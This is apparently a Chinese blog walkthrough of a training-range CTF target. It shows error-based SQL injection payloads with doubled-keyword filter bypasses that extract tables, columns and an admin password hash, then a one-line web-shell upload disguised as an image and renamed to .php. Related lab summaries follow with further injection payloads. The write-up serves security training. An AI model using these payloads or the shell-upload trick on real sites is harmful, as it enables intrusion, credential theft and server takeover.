封神台靶场-sql-注入绕过防护getshell

最新推荐文章于 2024-06-28 18:10:49 发布
最新推荐文章于 2024-06-28 18:10:49 发布
阅读量5.6k 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43446292/article/details/123401201
本文探讨了如何通过SQL注入尝试登录admin界面,揭示了数据库过滤机制,以及作者逐步获取表名、列名和敏感数据的过程。最终,作者揭示了密码并利用漏洞进行操作,展示了安全防护的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

url为http://rhiq8003.ia.aqlab.cn/bees/,此页面尝试sql注入,不成功;在路径后面加admin可以跳转到管理员登录界面,
http://rhiq8003.ia.aqlab.cn/bees/admin
在
在登录框测试sql注入,输入admin’/123456(直接使用admin/admin即可成功登录)
在这里插入图片描述
报错,存在字符型注入,使用报错注入进行测试,根据响应结果可知对and过滤,使用双写
admin’ an and d updatexml(1,concat(0x7e,(select database()),0x7e),1)–+
在这里插入图片描述
一、表名
admin’ an and d updatexml(1,concat(0x7e,(seselectlect group_concat(table_name) fr from om information_schema.tables wh where ere table_schema like database()),0x7e),1)–+
在这里插入图片描述
没有完全显示出表名,可以使用substr()或者limit,其中limit函数不能与group_concat一起使用
1、admin’ an and d updatexml(1,substr(concat(0x7e,(seselectlect group_concat(table_name) fr from om information_schema.tables wh where ere table_schema like database()),0x7e),29,50),1)–+
2、admin’ an and d updatexml(1,concat(0x7e,(seselectlect concat(table_name) fr from om information_schema.tables wh where ere table_schema like database() limit 2,1),0x7e),1)
–+
二、列名
admin’ an and d updatexml(1,substr(concat(0x7e,(seselectlect group_concat(column_name) fr from om information_schema.columns wh where ere table_name like ‘bees_admin’),0x7e),1,30),1)–+在这里插入图片描述
三、数据
admin’ an and d updatexml(1,substr(concat(0x7e,(seselectlect group_concat(admin_name,0x7e,admin_password) fr from om bees_admin),0x7e),1,30),1)–+
在这里插入图片描述
在这里插入图片描述

最后得到admin/21232f297a57a5a743894a0e4a801fc3,解密后得到密码admin
登录成功后内容管理-上传图片图片-修改,上传后缀名为.jpg的一句话文件,抓包修改后缀名为php,然后菜刀连接
在这里插入图片描述

封神台(尤里的复仇Ⅱ 回归)绕过防护getshell
Bu2n的博客
01-05 3634
解题思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
封神台(尤里的复仇),信息收集1--靶场练习,纯手工注入
久恙502的博客
10-10 863
尤里的复仇,做过一遍重新复现一次,练习渗透测试
封神台靶场学习-sql-注入绕过防护getshell
buggun6的博客
11-19 851
很好,没花啥功夫就找到了上传点,要求我们只允许上传的图片类型:gif|jpeg|png|jpg|bmp。总结:这次靶场个人感觉质量还是挺高的,和之前省赛的题有点像, 自己要坚持努力学习!好的进入后台了,现在要找flag很明显就不得不找找文件上传点写码上传试试了。很明显没有返回我们想要的东西,联合注入这条路估计是行不通了。ok,既然拿到用户名和密码了,不直接登录还有其他选项吗。解密发现密码也是admin,好家伙,弱口令是吧(nice,报错注入可以,我们发现数据库了。
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 673
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
掌控者靶场sql-注入绕过防护getshell
xia_qin的博客
01-08 749
里面有一个flag,刚开始我还比较不相信,抱着试试的心态去给flag,没想到真是这个。这里靶场作者肯定不是这么想的,你们还可以试试照提示说的去做。先看提示,说让我们sql注入,然后获取getshell。我们先开始进行信息收集,这是第一步,也是最重要的一步。使用kali Linux的dirsearch扫描目录。结果找到了一个名叫flag.txt的文件。扫出了好多目录,其中还有后台登录目录。试试找找有没有出错的文件。
SQL注入安全狗直接getshell
qq_42042353的博客
09-26 482
实验环境 1、phpstudy搭建的SQLi-Labs(MySQL) 2、安全狗4.0 成功所需要的条件 1、准备一个可以过狗过杀软的一句话 2、网站目录的绝对路径 直接进入正题 普通的注入攻击直接被安全狗拦截 比方说我们获取到的网站绝对路径为“C:/phpStudy4IIS/WWW/” (这里获取网站绝对路径有很多方式,不一一说明) 这里用到的注入用的是MySQL的数据导入功能“LINES TERMINATED BY” 它的功能就是将我们构造好的字符串直接导入在具体的文件里。很多waf并没有对MySQL
封神台】漏洞挖掘与代码审计 wp
孤桜懶契
08-15 696
前言 掌控安全里面的靶场漏洞挖掘与代码审计,练练手! 本地包含漏洞审计 环境 :http://wjbh522a.zs.aqlab.cn/ 默认弱密码登陆 admin admin 登陆之后发现是个4.8.1的版本,其实这题做的方法太多了,也可以不用代码审计,网上有一堆payload远程文件包含,不过这个靶场说下源代码审计,那就看看。 下载源码:https://www.phpmyadmin.net/files/4.8.1/ 因为提示说了文件包含,直接全局搜索include 分析
封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 1151
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
封神台靶场
m0_71518346的博客
10-18 874
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
封神台的一次SQL注入靶场渗透测试
人若无名,便可专心练剑
06-28 859
这个题目总的来讲还是蛮中规中矩的,没有对什么关键字进行过滤啥的,但是这里我后面尝试使用sqlmap跑,跑了很久,应该是这个网站对大量流量有个限制啥的,师傅们可以尝试下。这篇文章写出来的WP并不是主要是这道题目,而是给大家讲下做这道题目的一个思路以及实战中的一些注意事项什么的。最后希望能对师傅们有点帮助,嘿嘿嘿!!!
封神台SQL注入-基础靶场1-显错注入
原味瓜子、的博客
09-28 1515
一、显错注入 Pass-01 判断注入类型 id=1 //有回显 id=1' // No results found 判断为数字型注入 判断有几列 id=1 order by 3 //有回显 id=1 order by 4 // No results found 判断有三列 判断回显点 id=1 union select 1,2,3 ...
封神台】有WAF的SQL注入
qq_63806300的博客
12-26 478
封神台、waf、sql注入
SQL注入漏洞-10】SQL注入-getshell靶场实战
cc
02-08 5815
没有写入webshell的情况有两种:● 网站的路径不对,或者没有使用双斜杠进行转义● secure_file_priv的值不是为空。利用的前提条件: • 知道网站的绝对路径(根目录,或者是根目录往下的目录都可以) • web目录具有写的权限,能够使用单引号 • secure_file_priv没有具体值(在mysql/my.ini中查看)
MySql 高级查询 union 联合查询
qq_39286483的博客
01-09 343
1. union 联合查询 将多个查询结果集合到一起 2. 语法 select 查询语句 union select 查询语句 union select 查询语句 union select 查询语句 3. 例子: 查询学生信息和班级信息,集合到一起 select class_id,class_name,class_room from class UNION select name...
封神台】无WAF的SQL注入
qq_63806300的博客
12-17 1798
封神台SQL注入
封神台SQL注入-基础靶场1-Head注入
原味瓜子、的博客
10-10 1218
1111
封神台----SQL注入基础(猫舍)
m0_74083553的博客
03-11 586
提示已经很明显了通过sql注入拿到管理员密码点击传送门进来发现是一个很简陋的页面点击查看试试看我们可以看到地址栏后面变成了?id=1。说明和后台数据库有交互可以尝试sql注入
封神台sql注入---第一章节: 为了女神小芳
qq_52573109的博客
09-14 888
1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解题过程: (1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。 (2):判断字段个数: 注入代码: order by 2 ...
封神台SQL注入-延时注入
qq_40941912的博客
10-05 467
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 相关函数 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 sleep() if(expr1.expr2,expr3) =>判断语句,第一个正确执行2,错误执行3 二、作业 (一) SQL注入-延时盲注 R
封神台靶场第三关
最新发布
03-26
### 封神台靶场第三关解决方案 封神台靶场是一个专门为新手设计的学习平台,其中包含了大量常见的 Web 安全漏洞[^3]。对于第三关的挑战,通常涉及 Cookie 的篡改以及权限提升的技术。 #### 背景分析 在这一关中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值